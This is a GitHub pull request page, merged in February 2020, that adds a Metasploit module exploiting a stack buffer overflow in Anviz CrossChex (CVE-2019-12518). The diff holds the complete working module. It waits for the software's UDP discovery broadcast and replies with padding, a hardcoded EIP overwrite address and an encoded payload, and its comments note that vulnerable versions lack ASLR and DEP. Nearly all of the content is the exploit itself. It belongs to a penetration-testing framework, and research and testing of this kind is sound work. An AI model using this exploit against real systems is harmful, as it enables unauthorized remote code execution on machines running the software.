Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add crosschex buffer overflow exploit #12902

Merged
merged 13 commits into from
Feb 13, 2020
Merged

Add crosschex buffer overflow exploit #12902

Changes from 6 commits
Commits
Show all changes
13 commits
Select commit Hold shift + click to select a range
6b22917
Add crosschex buffer overflow exploit
agalway-r7 Feb 3, 2020
2ce3cb9
updated description
agalway-r7 Feb 3, 2020
4fd865f
PR Changes: Comments, fail_with, and cleanup
agalway-r7 Feb 4, 2020
37065f5
PR Changes: More Cleanup
agalway-r7 Feb 4, 2020
671f2e9
msfTidy: set disclosure date to proper format
agalway-r7 Feb 4, 2020
d76546f
clarifies inserted shell code's function
agalway-r7 Feb 4, 2020
ddec8a5
disables payload padding and describes shell code
agalway-r7 Feb 5, 2020
3395b91
adds module documentation
agalway-r7 Feb 10, 2020
a7a80e0
Updated docs with platform info
agalway-r7 Feb 11, 2020
946e244
Updates docs and adds basic options
agalway-r7 Feb 11, 2020
8fd3b48
improves option descriptions & timeout handling
agalway-r7 Feb 11, 2020
cbcf8a2
adds to_i and removes default options
agalway-r7 Feb 12, 2020
2ca2b5c
replaces magic numbers with target fields
agalway-r7 Feb 13, 2020
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
77 changes: 77 additions & 0 deletions modules/exploits/windows/misc/crosschex_device_bof.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,77 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
PACKET_LEN = 10

include Msf::Exploit::Remote::Udp

def initialize(info = {})
super(update_info(info,
'Name' => 'Anviz CrossChex Buffer Overflow',
'Description' => %q{
Waits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom broadcast,
agalway-r7 marked this conversation as resolved.
Show resolved Hide resolved
triggering a stack buffer overflow.
},
'Author' =>
[
'Luis Catarino <lcatarino@protonmail.com>', # original discovery/exploit
'Pedro Rodrigues <pedrosousarodrigues@protonmail.com>', # original discovery/exploit
'agalway-r7', # Module creation
'adfoster-r7' # Module creation
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2019-12518'],
['URL', 'https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html'],
['EDB', '47734']
],
'DefaultOptions' =>
{
'TIMEOUT' => 100,
'EncoderType' => Msf::Encoder::Type::Raw,
'CHOST' => "0.0.0.0",
'CPORT' => 5050
},
'Payload' =>
{
'Space' => 8947,
},
'Arch' => ARCH_X86,
'Privileged' => true,
'Platform' => 'win',
agalway-r7 marked this conversation as resolved.
Show resolved Hide resolved
'DisclosureDate' => '2019-11-28',
'Targets' =>
[
[
'Crosschex Standard x86 <= V4.3.12',
{}
]
],
'DefaultTarget' => 0
))
deregister_udp_options
end

def exploit
connect_udp
wvu marked this conversation as resolved.
Show resolved Hide resolved

res, host, port = udp_sock.recvfrom(PACKET_LEN, datastore["TIMEOUT"])
unless res
fail_with(Failure::TimeoutExpired, "Module timed out waiting for CrossChex broadcast")
end

print_status "CrossChex broadcast received, sending payload in response"
sploit = rand_text_english(261)
wvu marked this conversation as resolved.
Show resolved Hide resolved
sploit << "\x07\x18\x42\x00" # Overwrites EIP to point to payload // Vulnerable CrossChex versions don't use ASLR or DEP
wvu marked this conversation as resolved.
Show resolved Hide resolved
sploit << rand_text_english(4)
sploit << payload.encoded

udp_sock.sendto(sploit, host, port)
print_status "Payload sent"
end
end